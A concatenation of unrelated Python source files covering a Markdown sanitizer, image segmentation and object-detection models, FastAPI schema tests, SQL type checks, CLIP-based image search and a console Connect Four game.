if len(itemlist) < 2:
        return ''.join(itemlist)
return ', '.join(itemlist[:-1]) + f', {word} ' + itemlist[-1]
def markdown_to_sanitized_html(text: str) -> SafeText:
'''
Render the given untrusted Markdown to sanitized HTML.
Examples:
>>> markdown_to_sanitized_html('hello **there** *u*')
'<p>hello <strong>there</strong> <em>u</em></p>'
>>> markdown_to_sanitized_html('<script>meh</script>')
    '&lt;script&gt;meh&lt;/script&gt;'
'''
return SafeText(bleach.clean(
markdown(text),
tags=['p', 'strong', 'em']
))
|
486087
|
import os
import tensorflow as tf
from components import metrics
from components.feature_extractor import feature_extractor
from components.semantic_segmentation import SemanticSegmentationModel
from components.instance_segmentation import InstanceSegmentationModel
from components.panoptic_ops import merge_to_panoptic
from utils import summaries
class PanopticSegmentationModel(object):
def __init__(self, images, labels, params, instance_gt=None):
self.params = params
self.images = images
self.labels = labels
self.instance_gt = instance_gt
self.semantic_segmentation = SemanticSegmentationModel(self.params)
self.instance_segmentation = InstanceSegmentationModel(self.params, is_training=params.is_training)
self.apply_semantic_branch = params.apply_semantic_branch
self.apply_instance_branch = params.apply_instance_branch
self.groundtruth_dict = None
if self.params.is_training:
self.prepare_gt()
def predict(self):
features, _ = feature_extractor(None, self.images, self.params)
prediction_dict = dict()
if self.apply_semantic_branch:
logits = self.semantic_segmentation.predict(features)
prediction_dict['logits'] = logits
if self.apply_instance_branch:
prediction_dict.update(self.instance_segmentation.predict(features, prediction_dict, self.groundtruth_dict))
return prediction_dict
def postprocess(self, prediction_dict):
if self.apply_semantic_branch:
probs, predictions = self.semantic_segmentation.postprocess(prediction_dict['logits'])
prediction_dict['semantic'] = predictions
prediction_dict['semantic_probs'] = probs
if self.apply_instance_branch:
prediction_dict = self.instance_segmentation.postprocess(prediction_dict)
if self.apply_semantic_branch and self.apply_instance_branch:
prediction_dict = merge_to_panoptic(prediction_dict, self.params)
return prediction_dict
def loss(self, prediction_dict, save_image_summaries=True, save_eval_summaries=True):
with tf.variable_scope("GetRegularization"):
l2_regularizer = tf.contrib.layers.l2_regularizer(self.params.regularization_weight)
reg_vars = [v for v in tf.trainable_variables() if 'weights' in v.name]
reg_loss = tf.contrib.layers.apply_regularization(l2_regularizer, reg_vars)
tf.summary.scalar('regularization', reg_loss, family='losses')
losses_dict = dict()
if self.apply_semantic_branch:
logits = prediction_dict['logits']
labels, weights = self.semantic_segmentation.format_gt(self.labels)
sem_loss = self.semantic_segmentation.loss(logits=logits, labels=labels, weights=weights)
losses_dict['semantic'] = sem_loss
if save_image_summaries:
summaries.image_summaries(self.images, labels, logits, weights, self.params)
if save_eval_summaries:
with tf.variable_scope('miou_training'):
predictions = tf.nn.softmax(logits)
predictions = tf.argmax(predictions, axis=-1)
labels = tf.reshape(labels, [-1])
predictions = tf.reshape(predictions, [-1])
weights = tf.reshape(weights, [-1])
total_cm = tf.confusion_matrix(labels=labels,
predictions=predictions,
num_classes=self.params.num_classes,
weights=weights)
miou = metrics.compute_mean_iou(total_cm)
tf.summary.scalar('mIoU', tf.cast(miou, tf.float32), family='metrics')
if self.apply_instance_branch:
loss_dict = self.instance_segmentation.loss(prediction_dict, self.groundtruth_dict)
losses_dict.update(loss_dict)
if save_image_summaries:
prediction_dict = self.instance_segmentation.postprocess(prediction_dict)
self.gt_boxes = self.instance_gt['boxes']
self.gt_num_boxes = self.instance_gt['num_boxes']
summaries.image_summaries_boxes(self.images,
self.gt_num_boxes,
self.gt_boxes,
prediction_dict,
self.params)
with tf.variable_scope("TotalLoss"):
# Get total loss
total_loss = reg_loss
for loss_value in losses_dict.values():
total_loss += loss_value
tf.summary.scalar('total', total_loss, family='losses')
return total_loss
def prepare_gt(self):
groundtruth_dict = dict()
if self.apply_instance_branch:
groundtruth_dict_ins = self.instance_segmentation.format_gt_dict(self.instance_gt)
groundtruth_dict.update(groundtruth_dict_ins)
if self.apply_semantic_branch:
groundtruth_dict_sem = {'labels': self.labels}
groundtruth_dict.update(groundtruth_dict_sem)
self.groundtruth_dict = groundtruth_dict
@staticmethod
def save(saver, sess, logdir, step):
model_name = 'model.ckpt'
checkpoint_path = os.path.join(logdir, model_name)
if not os.path.exists(logdir):
os.makedirs(logdir)
saver.save(sess, checkpoint_path, global_step=step)
print('The checkpoint has been created.')
@staticmethod
def load(saver, sess, ckpt_path):
saver.restore(sess, ckpt_path)
print("Restored model parameters from {}".format(ckpt_path))
if __name__ == '__main__':
pass
|
486152
|
from fastapi_hypermodel.hypermodel import _uri_schema
def _is_subset(d1: dict, d2: dict):
return all(d1.get(k) == d2.get(k) for k in d2)
def test_openapi_schema_href(app):
openapi = app.openapi()
href_schema = openapi["components"]["schemas"]["Person"]["properties"]["href"]
assert _is_subset(href_schema, _uri_schema)
def test_openapi_schema_linkset(app):
openapi = app.openapi()
linkset_schema = openapi["components"]["schemas"]["Person"]["properties"]["links"]
assert linkset_schema["type"] == "object"
assert _is_subset(linkset_schema["additionalProperties"], _uri_schema)
|
486172
|
import sys
class Tipo():
def __init__(self, tipo=None, valor=None, size=0, decimales=0):
        'Get the value of the instruction'
self.valor = valor
self.tipo = tipo
self.size = size
self.decimales = decimales
def devString(self):
cad: str = str(self.tipo)
if self.size > 0:
cad += '(' + str(self.size)
if self.decimales > 0:
cad += ',' + str(self.decimales)
if self.size > 0 or self.decimales > 0:
cad += ')'
return cad
def tipoInt(self):
        'Determine the appropriate integer type for the value'
if self.valor <= 32767 and self.valor >= -32768:
self.tipo = 'smallint'
elif self.valor <= 2147483647 and self.valor >= -2147483648:
self.tipo = 'integer'
elif self.valor <= 9223372036854775807 and self.valor >= -9223372036854775808:
self.tipo = 'bigint'
    def tipoDecimal(self):
        'Determine the appropriate decimal type for the value'
        decimales = str(self.valor).split('.')
        if len(decimales[1]) <= 6:
            self.tipo = 'real'
        elif len(decimales[1]) <= 15:
            if -92233720368547758.08 <= self.valor <= 92233720368547758.07:
                self.tipo = 'money'
            else:
                self.tipo = 'double'
        else:
            self.tipo = 'decimal'
    def getTipo(self):
        if self.tipo == 'int':
            self.tipoInt()
        elif self.tipo == 'decimal':
            self.tipoDecimal()
        return self.tipo
def comparetipo(self, tipocolumn, tipovalor):
        'Compare the column type with the value type'
tipovalor.tipo = tipovalor.tipo.lower()
tipocolumn.tipo = tipocolumn.tipo.lower()
if tipocolumn.tipo == 'int':
tipocolumn.tipo = 'integer'
if tipovalor.tipo in ('decimal', 'numeric', 'double', 'real', 'money'):
tipovalor.size = tipovalor.size - 1
if tipocolumn.size >= tipovalor.size or tipocolumn.size == -1:
            if tipocolumn.tipo in ('decimal', 'numeric'):
                if tipovalor.tipo in ('decimal', 'numeric', 'bigint', 'smallint', 'integer', 'money', 'double', 'real'):
                    return True
            elif tipocolumn.tipo == 'double':
                if tipovalor.tipo in ('double', 'bigint', 'smallint', 'integer', 'money', 'real'):
                    return True
            elif tipocolumn.tipo == 'money':
                if tipovalor.tipo in ('bigint', 'smallint', 'integer', 'money', 'real'):
                    return True
            elif tipocolumn.tipo == 'real':
                if tipovalor.tipo in ('bigint', 'smallint', 'integer', 'real'):
                    return True
            elif tipocolumn.tipo == 'bigint':
                if tipovalor.tipo in ('bigint', 'smallint', 'integer'):
                    return True
            elif tipocolumn.tipo == 'integer':
                if tipovalor.tipo in ('smallint', 'integer'):
                    return True
            elif tipocolumn.tipo == 'smallint':
                if tipovalor.tipo == 'smallint':
                    return True
elif tipocolumn.tipo in ('varchar', 'char', 'character varyng', 'text', 'character'):
if tipovalor.tipo in ('varchar', 'char', 'character varyng', 'text', 'character'):
return True
elif tipocolumn.tipo == 'timestamp without time zone':
if tipovalor.tipo in ('date', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'date':
if tipovalor.tipo in ('date', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'time without time zone':
if tipovalor.tipo in ('time without time zone', 'timestamp without time zone'):
return True
elif tipocolumn.tipo == 'boolean':
if tipovalor.tipo == 'boolean':
return True
|
486176
|
class Tracker:
def __init__(self, con):
self.con = con
def get_tracking(self):
tracking = dict()
for notice in self.con.notices:
splits = notice.split()
if splits[1] == 'TRACK':
if splits[2] in tracking:
tracking[splits[2]].append(splits[3:])
else:
tracking[splits[2]] = [splits[3:]]
return tracking
def clear_track(self):
self.con.notices.clear()
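# Assumed notice format (e.g. psycopg2 `connection.notices`): each entry looks
# like "NOTICE: TRACK <key> <field> ...", so splits[1] is the 'TRACK' marker,
# splits[2] the grouping key, and splits[3:] the tracked payload.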
|
486243
|
import os
import time
import wget
import paddle
from PIL import Image
from .translator import Translator
from clip import tokenize, load_model
class IMSP:
def __init__(self, db_file=None):
self.model, self.transforms = load_model('ViT_B_32', pretrained=True)
if db_file is None:
db_file = 'image_db'
db_url = 'https://bj.bcebos.com/v1/ai-studio-online/775e9601019646b2a09f717789a4602f069a26302f8643418ec7c2370b895da9?responseContentDisposition=attachment%3B%20filename%3Dimage_db'
if not os.path.isfile(db_file):
wget.download(db_url)
self.image_features, self.photo_ids = self.load_db(db_file)
self.translator = Translator()
@staticmethod
def load_db(db_file):
image_db = paddle.load(db_file)
image_features = image_db['image_features'].astype('float32')
image_features = paddle.to_tensor(image_features)
photo_ids = image_db['photo_ids']
return image_features, photo_ids
@staticmethod
def get_urls(photo_ids):
urls = []
for photo_id in photo_ids:
url = f"https://unsplash.com/photos/{photo_id}"
urls.append(url)
return urls
@staticmethod
def is_chinese(texts):
return any('\u4e00' <= char <= '\u9fff' for char in texts)
def im_search(self, texts, topk=5, return_urls=True):
if self.is_chinese(texts):
texts = self.translator.translate(texts)
texts = tokenize(texts)
with paddle.no_grad():
text_features = self.model.encode_text(texts)
logit_scale = self.model.logit_scale.exp()
logits_per_text = logit_scale * text_features @ self.image_features.t()
indexs = logits_per_text.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
def im_pair(self, images, topk=5, return_urls=True):
images = Image.open(images)
images = self.transforms(images).unsqueeze(0)
with paddle.no_grad():
image_features = self.model.encode_image(images)
logit_scale = self.model.logit_scale.exp()
logits = logit_scale * image_features @ self.image_features.t()
indexs = logits.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
def im_search_pair(self, images=None, texts=None, topk=5, return_urls=True):
if images is not None:
if isinstance(images, list):
input_images = []
for image in images:
image = Image.open(image)
image = self.transforms(image).unsqueeze(0)
input_images.append(image)
input_images = paddle.concat(input_images)
elif isinstance(images, str):
input_images = Image.open(images)
input_images = self.transforms(input_images).unsqueeze(0)
with paddle.no_grad():
image_features = self.model.encode_image(input_images)
if texts is not None:
if isinstance(texts, list):
input_texts = []
for text in texts:
if self.is_chinese(text):
input_texts.append(self.translator.translate(text))
time.sleep(1)
else:
input_texts.append(text)
elif isinstance(texts, str):
if self.is_chinese(texts):
input_texts = self.translator.translate(texts)
else:
input_texts = texts
input_texts = tokenize(input_texts)
with paddle.no_grad():
text_features = self.model.encode_text(input_texts)
if images and texts:
features = paddle.concat([image_features, text_features], 0)
features = paddle.sum(features, axis=0, keepdim=True)
elif images:
features = paddle.sum(image_features, axis=0, keepdim=True)
elif texts:
features = paddle.sum(text_features, axis=0, keepdim=True)
logit_scale = self.model.logit_scale.exp()
logits = logit_scale * features @ self.image_features.t()
indexs = logits.topk(topk)[1][0]
photo_ids = [self.photo_ids[index] for index in indexs]
if return_urls:
return self.get_urls(photo_ids)
else:
return photo_ids
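# Usage sketch (the query string and image file name are illustrative):
#
#   imsp = IMSP()                          # downloads 'image_db' on first use
#   urls = imsp.im_search("a dog running on the beach", topk=3)
#   urls = imsp.im_search_pair(images="photo.jpg", texts="at sunset", topk=3)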
|
486249
|
import torch
import torchvision
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
# from torchvision.ops import PSRoIPool
from torch_resnet import ResNet_BaseNet
from config import opt
from RPN import RegionProposalNetwork, normal_init
from utils.bbox_tools import totensor, tonumpy, loc2bbox
from data.dataset import preprocess
from utils.psroi_module import PSRoIPooling2D
class RFCN(nn.Module):
"""
R-FCN base class
"""
def __init__(self,
extractor_phase1,
rpn: RegionProposalNetwork,
head,
loc_normalize_mean=(0., 0., 0., 0.),
loc_normalize_std=(0.1, 0.1, 0.2, 0.2)):
super(RFCN, self).__init__()
self.extractor_phase1 = extractor_phase1
self.rpn = rpn
self.head = head
# mean and std
self.loc_normalize_mean = loc_normalize_mean
self.loc_normalize_std = loc_normalize_std
self.use_preset('evaluate')
self.class_num = opt.class_num
self.n_cls_reg = self.class_num if opt.cls_reg_specific else 2
def forward(self, x, scale=1.):
"""
:param x: x (autograd.Variable): 4D image variable.
:param scale: Amount of scaling applied to the raw image during preprocessing.
:return:
* **roi_cls_locs**: Offsets and scalings for the proposed RoIs. \
Its shape is :math:`(R', (L + 1) \\times 4)`.
* **roi_scores**: Class predictions for the proposed RoIs. \
Its shape is :math:`(R', L + 1)`.
* **rois_batch**: RoIs proposed by RPN. Its shape is \
:math:`(R', 4)`.
* **rois_batch_indices**: Batch indices of RoIs. Its shape is \
:math:`(R',)`.
"""
# height and width
img_size = x.shape[2:]
h = self.extractor_phase1(x)
rpn_locs, rpn_scores, rois_batch, rois_batch_indices, anchor = \
self.rpn(h, img_size, scale)
# shape:(R, 4 * num_cls_reg) & (R, class_num_withBg)
rois_batch = totensor(rois_batch).float()
rois_batch_indices = totensor(rois_batch_indices)
roi_locs, roi_scores = self.head(h, rois_batch, rois_batch_indices)
return roi_locs, roi_scores, rois_batch, rois_batch_indices
def use_preset(self, preset):
"""Use the given preset during prediction.
This method changes values of :obj:`self.nms_thresh` and
:obj:`self.score_thresh`. These values are a threshold value
used for non maximum suppression and a threshold value
to discard low confidence proposals in :meth:`predict`,
respectively.
If the attributes need to be changed to something
other than the values provided in the presets, please modify
them by directly accessing the public attributes.
Args:
            preset ({'visualize', 'evaluate'}): A string to determine the
preset to use.
"""
if preset == "visualize":
self.nms_thresh = 0.3
self.score_thresh = 0.7
elif preset == "evaluate":
self.nms_thresh = 0.3
self.score_thresh = 0.05
else:
raise ValueError("preset must be 'visualize' or 'evaluate'")
@torch.no_grad()
def predict(self, imgs, sizes=None, visualize=False):
"""Detect objects from images.
This method predicts objects for each image.
Args:
imgs (iterable of numpy.ndarray): Arrays holding images.
All images are in CHW and RGB format
and the range of their value is :math:`[0, 255]`.
Returns:
tuple of lists:
This method returns a tuple of three lists,
:obj:`(bboxes, labels, scores)`.
* **bboxes**: A list of float arrays of shape :math:`(R, 4)`, \
where :math:`R` is the number of bounding boxes in a image. \
                Each bounding box is organized by \
:math:`(y_{min}, x_{min}, y_{max}, x_{max})` \
in the second axis.
* **labels** : A list of integer arrays of shape :math:`(R,)`. \
Each value indicates the class of the bounding box. \
Values are in range :math:`[0, L - 1]`, where :math:`L` is the \
number of the foreground classes.
* **scores** : A list of float arrays of shape :math:`(R,)`. \
Each value indicates how confident the prediction is.
"""
self.eval()
if visualize:
self.use_preset('visualize')
prepared_imgs = list()
sizes = list()
for img in imgs:
size = img.shape[1:] # original height & width
img, _ = preprocess(tonumpy(img))
prepared_imgs.append(img)
sizes.append(size)
else:
self.use_preset('evaluate')
prepared_imgs = imgs
b_bboxes = list()
b_labels = list()
b_scores = list()
for i, (img, size) in enumerate(zip(prepared_imgs, sizes)):
img = totensor(img[None]).float() # Expand a dimension
scale = img.shape[3] / size[1] # scale ratio
roi_locs, roi_scores, rois, roi_indices = self(img, scale=scale)
# We are assuming that batch size is 1.
roi_score = roi_scores.data # shape: (Ri, self.class_num)
roi_loc = roi_locs.data # shape: (Ri, n_cls_reg * 4)
# Convert predictions to bounding boxes in image coordinates.
# Bounding boxes are scaled to the scale of the input images.
roi = totensor(rois) / scale
# denormalize
mean = torch.Tensor(self.loc_normalize_mean).cuda().repeat(self.n_cls_reg)[None]
std = torch.Tensor(self.loc_normalize_std).cuda().repeat(self.n_cls_reg)[None]
roi_loc = (roi_loc * std + mean)
roi_loc = roi_loc.view(-1, self.n_cls_reg, 4)
roi = roi.view(-1, 1, 4).expand_as(roi_loc)
roi_bbox = loc2bbox(tonumpy(roi).reshape((-1, 4)),
tonumpy(roi_loc).reshape(-1, 4))
roi_bbox = totensor(roi_bbox)
roi_bbox = roi_bbox.view(-1, self.n_cls_reg * 4)
# clip bounding box
roi_bbox[:, 0::2] = (roi_bbox[:, 0::2]).clamp(min=0, max=size[0])
roi_bbox[:, 1::2] = (roi_bbox[:, 1::2]).clamp(min=0, max=size[1])
prob = F.softmax(totensor(roi_score), dim=1)
bboxes, labels, scores = self._suppress(roi_bbox, prob)
b_bboxes.append(bboxes)
b_labels.append(labels)
b_scores.append(scores)
self.train()
return b_bboxes, b_labels, b_scores
def _suppress(self, raw_bbox, raw_prob):
"""
NMS for each class
:param raw_cls_bbox: Tensor, all predict bboxes
:param raw_prob: Tensor, confidence of predict bboxes after softmax
:return:
"""
raw_bbox = raw_bbox.reshape((-1, self.n_cls_reg, 4))
bboxes, labels, scores = list(), list(), list()
# skip cls_id = 0 because it is the background class
for l in range(1, self.class_num):
# class agnostic: the same regression factors for all classes(different conf)
# class specific: different regression factors for different class
if opt.cls_reg_specific:
bbox_l = raw_bbox[:, l, :]
else:
bbox_l = raw_bbox[:, 1, :]
prob_l = raw_prob[:, l]
# filter by confidence threshold
mask = prob_l > self.score_thresh
bbox_l = bbox_l[mask]
prob_l = prob_l[mask]
keep = torchvision.ops.nms(bbox_l, prob_l, self.nms_thresh)
bboxes.append(bbox_l[keep])
scores.append(prob_l[keep])
# predict label is 0-19
labels.append((l-1) * np.ones((len(keep), ), dtype=np.int32))
bboxes = tonumpy(torch.cat(bboxes, dim=0)).astype(np.float32)
scores = tonumpy(torch.cat(scores, dim=0)).astype(np.float32)
labels = np.concatenate(labels, axis=0).astype(np.int32)
return bboxes, labels, scores
class ResNet101_PsROI_Head(nn.Module):
"""
ROI Head of R-FCN
"""
def __init__(self, class_num, k, spatial_scale, extractor_phase2):
"""
:param class_num: the number of classes (include background)
:param k: the number of bin for psRoI
:param spatial_scale stride of the feature extractor(ex:1/16.)
:param extractor_phase2 feature extractor 2
"""
super(ResNet101_PsROI_Head, self).__init__()
self.class_num = class_num
self.k = k
self.spatial_scale = spatial_scale
self.n_cls_reg = class_num if opt.cls_reg_specific else 2
self.extractor_phase2 = extractor_phase2
self.generatePsScoreMap = nn.Conv2d(1024, self.k * self.k * self.class_num, kernel_size=(1, 1), bias=True)
self.generateLocMap = nn.Conv2d(1024, self.k * self.k * self.n_cls_reg * 4, kernel_size=(1, 1), bias=True)
# self.psROI_score = PSRoIPool(self.k, spatial_scale=self.spatial_scale)
# self.psROI_loc = PSRoIPool(self.k, spatial_scale=self.spatial_scale)
self.psROI_score = PSRoIPooling2D(pool_size=self.k, spatial_scale=self.spatial_scale)
self.psROI_loc = PSRoIPooling2D(pool_size=self.k, spatial_scale=self.spatial_scale)
self.avg_pool_score = nn.AvgPool2d(kernel_size=self.k, stride=self.k)
self.avg_pool_loc = nn.AvgPool2d(kernel_size=self.k, stride=self.k)
from utils.psroi_module import acitvate_PsROI_for_eval
acitvate_PsROI_for_eval(self.psROI_score)
normal_init(self.generatePsScoreMap, 0, 0.01)
normal_init(self.generateLocMap, 0, 0.01)
def forward(self, x, rois, roi_indices):
"""
forward of psRoI
:param x: input feature map
:param rois: rois, torch.tensor, shape:(S1+...+Sn, 4), here 4<==>(y_min, x_min, y_max, x_max)
:param roi_indices: Batch to which it belongs, shape: torch.tensor([0, 0, ..., 1, 1, ...])
:return:
roi_locs, (tx, ty, tw, th), shape:(sum(roi_num_i), 4)
roi_scores, class confidence, shape:(sum(roi_num_i), ClassNum)
"""
"""combine rois and indices"""
indices_and_rois = torch.cat([roi_indices[:, None], rois], dim=1)
# ([y_min, x_min, y_max, x_max] ==> [x_min, y_min, x_max, y_max])
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
indices_and_rois = xy_indices_and_rois.contiguous()
"""extract feature again"""
h = self.extractor_phase2(x)
"""roi classification"""
score_map = self.generatePsScoreMap(h) # channels: k^2 * (C+1), shape:(b, C, H, W)
# shape:(sum(roi_num_i) for all batch, ClassNum, k, k)
score_pooling = self.psROI_score(score_map, indices_and_rois)
roi_scores = self.avg_pool_score(score_pooling) # shape:(sum(roi_num_i), ClassNum, 1, 1)
roi_scores = roi_scores.squeeze() # shape:(sum(roi_num_i), ClassNum)
"""roi regression"""
loc_map = self.generateLocMap(h) # channels: k^2 * 4 * n_cls_reg, shape:(b, C, H, W)
# shape:(sum(roi_num_i) for all batch, n_cls_reg * 4, k, k)
loc_pooling = self.psROI_loc(loc_map, indices_and_rois)
roi_locs = self.avg_pool_loc(loc_pooling) # shape:(sum(roi_num_i), n_cls_reg * 4, 1, 1)
roi_locs = roi_locs.squeeze() # shape:(sum(roi_num_i), n_cls_reg * 4) ==> here 4 is (ty, tx, tw, th)
return roi_locs, roi_scores
from torchvision.ops import RoIPool
class VGG16RoIHead(nn.Module):
"""
ROI Head of Faster R-CNN
"""
def __init__(self, n_class, roi_size, spatial_scale, extractor_phase2):
# n_class includes the background
super(VGG16RoIHead, self).__init__()
self.extractor_phase2 = extractor_phase2
from torchvision.models import vgg16
vgg_weights_path = '/home/elbert/mount/win_data/model_para/vgg16-dict.pth'
model = vgg16(pretrained=False)
model.load_state_dict(torch.load(vgg_weights_path))
classifier = model.classifier
del classifier[6]
del classifier[5]
del classifier[2]
self.n_cls_reg = n_class if opt.cls_reg_specific else 2
self.classifier = classifier
self.cls_loc = nn.Linear(4096, self.n_cls_reg * 4)
self.score = nn.Linear(4096, n_class)
normal_init(self.cls_loc, 0, 0.001)
normal_init(self.score, 0, 0.01)
self.n_class = n_class
self.roi_size = roi_size
self.spatial_scale = spatial_scale
self.roi = RoIPool((self.roi_size, self.roi_size), self.spatial_scale)
def forward(self, x, rois, roi_indices):
indices_and_rois = torch.cat([roi_indices[:, None], rois], dim=1)
# (yx ==> xy)
xy_indices_and_rois = indices_and_rois[:, [0, 2, 1, 4, 3]]
indices_and_rois = xy_indices_and_rois.contiguous()
h = self.extractor_phase2(x)
pool = self.roi(h, indices_and_rois)
pool = pool.view(pool.size(0), -1)
fc7 = self.classifier(pool)
roi_cls_locs = self.cls_loc(fc7)
roi_scores = self.score(fc7)
return roi_cls_locs, roi_scores
class RFCN_ResNet101(RFCN):
"""
R-FCN base on resnet101
"""
# stride ==> 16
feat_stride = 16
def __init__(self,
ratios=[0.5, 1, 2],
anchor_scales=[8, 16, 32]):
extractor_phase1, extractor_phase2 = ResNet_BaseNet(opt.load_resnet101_path)
# fix ResNet parameters
for layer in extractor_phase1[:4+opt.FIXED_BLOCKS]:
for p in layer.parameters():
p.requires_grad = False
normal_init(extractor_phase2._modules['dim_sub'], 0, 0.01)
# fix BN layer
def set_bn_fix(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
for p in m.parameters():
p.requires_grad = False
extractor_phase1.apply(set_bn_fix)
extractor_phase2.apply(set_bn_fix)
rpn = RegionProposalNetwork(
in_channels=1024,
mid_channels=512,
ratios=ratios,
anchor_scales=anchor_scales,
feat_stride=self.feat_stride)
# fix RPN parameters
if opt.FIX_RPN:
for p in rpn.parameters():
p.requires_grad = False
head = ResNet101_PsROI_Head(opt.class_num, opt.roi_k,
spatial_scale=(1. / self.feat_stride),
extractor_phase2=extractor_phase2)
if opt.head_ver is not None:
head = VGG16RoIHead(opt.class_num, opt.roi_k, spatial_scale=(1. / self.feat_stride),
extractor_phase2=extractor_phase2) # vgg16 roi head
# fix Head parameters
if opt.FIX_HEAD:
for p in extractor_phase2.parameters():
p.requires_grad = False
for p in head.parameters():
p.requires_grad = False
super(RFCN_ResNet101, self).__init__(
extractor_phase1,
rpn,
head)
def train(self, mode=True):
# Override train so that the training mode is set as we want
nn.Module.train(self, mode)
if mode:
self.extractor_phase1.eval()
for fix_layer in range(6, 3 + opt.FIXED_BLOCKS, -1):
self.extractor_phase1[fix_layer].train()
# Set batchnorm always in eval mode during training or testing!
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
self.extractor_phase1.apply(set_bn_eval)
self.head.extractor_phase2.apply(set_bn_eval)
|
486251
|
from .transductive_experiment import TransductiveExperiment
from .multiple_run_experiment import MultipleRunExperiment
from .dataset import ExperimentDataset
|
486261
|
from detectron2.layers import batched_nms, cat
from detectron2.structures import Boxes, Instances
def fast_rcnn_inference(boxes, scores, image_shapes, score_thresh, nms_thresh, topk_per_image):
"""
Call `fast_rcnn_inference_single_image` for all images.
Args:
boxes (list[Tensor]): A list of Tensors of predicted class-specific or class-agnostic
boxes for each image. Element i has shape (Ri, K * 4) if doing
class-specific regression, or (Ri, 4) if doing class-agnostic
regression, where Ri is the number of predicted objects for image i.
This is compatible with the output of :meth:`FastRCNNOutputs.predict_boxes`.
scores (list[Tensor]): A list of Tensors of predicted class scores for each image.
Element i has shape (Ri, K + 1), where Ri is the number of predicted objects
for image i. Compatible with the output of :meth:`FastRCNNOutputs.predict_probs`.
image_shapes (list[tuple]): A list of (width, height) tuples for each image in the batch.
score_thresh (float): Only return detections with a confidence score exceeding this
threshold.
nms_thresh (float): The threshold to use for box non-maximum suppression. Value in [0, 1].
topk_per_image (int): The number of top scoring detections to return. Set < 0 to return
all detections.
Returns:
instances: (list[Instances]): A list of N instances, one for each image in the batch,
that stores the topk most confidence detections.
kept_indices: (list[Tensor]): A list of 1D tensor of length of N, each element indicates
the corresponding boxes/scores index in [0, Ri) from the input, for image i.
"""
result_per_image = [
fast_rcnn_inference_single_image(
boxes_per_image, scores_per_image, image_shape, score_thresh, nms_thresh, topk_per_image
)
for scores_per_image, boxes_per_image, image_shape in zip(scores, boxes, image_shapes)
]
return tuple(list(x) for x in zip(*result_per_image))
def fast_rcnn_inference_single_image(
boxes, scores, image_shape, score_thresh, nms_thresh, topk_per_image
):
"""
Single-image inference. Return bounding-box detection results by thresholding
on scores and applying non-maximum suppression (NMS).
Args:
Same as `fast_rcnn_inference`, but with boxes, scores, and image shapes
per image.
Returns:
Same as `fast_rcnn_inference`, but for only one image.
"""
scores = scores[:, :-1]
num_bbox_reg_classes = boxes.shape[1] // 4
# Convert to Boxes to use the `clip` function ...
boxes = Boxes(boxes.reshape(-1, 4))
boxes.clip(image_shape)
boxes = boxes.tensor.view(-1, num_bbox_reg_classes, 4) # R x C x 4
# Filter results based on detection scores
filter_mask = scores > score_thresh # R x K
# R' x 2. First column contains indices of the R predictions;
# Second column contains indices of classes.
filter_inds = filter_mask.nonzero()
if num_bbox_reg_classes == 1:
boxes = boxes[filter_inds[:, 0], 0]
else:
boxes = boxes[filter_mask]
scores = scores[filter_mask]
# Apply per-class NMS
keep = batched_nms(boxes, scores, filter_inds[:, 1], nms_thresh)
if topk_per_image >= 0:
keep = keep[:topk_per_image]
boxes, scores, filter_inds = boxes[keep], scores[keep], filter_inds[keep]
result = Instances(image_shape)
result.pred_boxes = Boxes(boxes)
result.scores = scores
result.pred_classes = filter_inds[:, 1]
return result, boxes, scores, keep
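if __name__ == "__main__":
    # A minimal, self-contained sketch (not from the original codebase) showing how
    # the helpers above could be exercised with dummy tensors. The class count, box
    # values and thresholds below are illustrative assumptions only.
    import torch

    num_fg_classes = 3                              # scores carry K + 1 columns (last = background)
    num_preds = 4                                   # Ri: predicted objects for the single image
    dummy_boxes = [torch.rand(num_preds, num_fg_classes * 4) * 100.0]   # class-specific regression (Ri, K*4)
    dummy_scores = [torch.softmax(torch.rand(num_preds, num_fg_classes + 1), dim=1)]
    image_shapes = [(200, 300)]

    instances, kept_boxes, kept_scores, kept_idx = fast_rcnn_inference(
        dummy_boxes, dummy_scores, image_shapes,
        score_thresh=0.05, nms_thresh=0.5, topk_per_image=100,
    )
    print(len(instances[0]), "detections kept for the first image")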
|
486269
|
from random import choice
from time import sleep
class Game:
def __init__(self):
self.map = []
self.p1 = 0
self.p2 = 0
self.game = False
def set_up(self):
a = 0
self.game = True
self.map = [[],[],[],[],[],[]]
while a < len(self.map):
while len(self.map[a]) < 6:
self.map[a].append(' ')
a +=1
user = input('What piece do you want to be represented by: R or Y ? ').lower()
if user=='r':
self.p1 ='R'
self.p2 = 'Y'
elif user=='y':
self.p1 = 'Y'
self.p2 = 'R'
else:
self.p1 = 'R'
self.p2 = 'Y'
def display(self,n):
a = str(n).replace("[",'')
b = a.replace(',','|')
c = b.replace("'","")
d = c.replace(']','')
print('|',d,'|')
def display2(self):
print(' 0 1 2 3 4 5')
print('-'*20)
for i in self.map:
self.display(i)
print('-'*20)
def play1(self):
self.display2()
col = 0
try:
col = eval(input('Pick a column: '))
        except (NameError, TypeError, ValueError, SyntaxError):
            print('Try Again')
            return self.play1()
        if col not in range(0,6):
            print('Out of range')
            return self.play1()
else:
if self.game==True:
self.insert(col,self.p1)
def check_full(self):
c = 0
a = 0
r = 0
while a < 6:
while r < 6:
if self.map[a][r] in ['R','Y']:
c +=1
r +=1
r = 0
a+=1
if c >=36:
print('FULL')
self.game = False
self.set_up()
    def check_map(self,n):
        a = 0 #row
        b = 0 #space
        c = 0 #counting
        while a < 6:
            while b < 6:
                if self.map[a][b]==n:
                    c +=1
                else:
                    c = 0
                if c >=4:
                    self.game = False
                b +=1
            b = 0
            c = 0
            a +=1
        a = 0 #row
        b = 0 #space
        c = 0
        while b < 6:
            while a < 6:
                if self.map[a][b]==n:
                    c +=1
                else:
                    c = 0
                if c>=4:
                    self.game = False
                a +=1
            a = 0
            c = 0
            b +=1
def insert(self,n,u):
a = 5
p = False
while a !=-1:
if self.map[a][n] not in ['R','Y']:
if p==False:
self.map[a][n] = u
p = True
a -=1
self.check_full()
if self.game==True:
self.check_map(u)
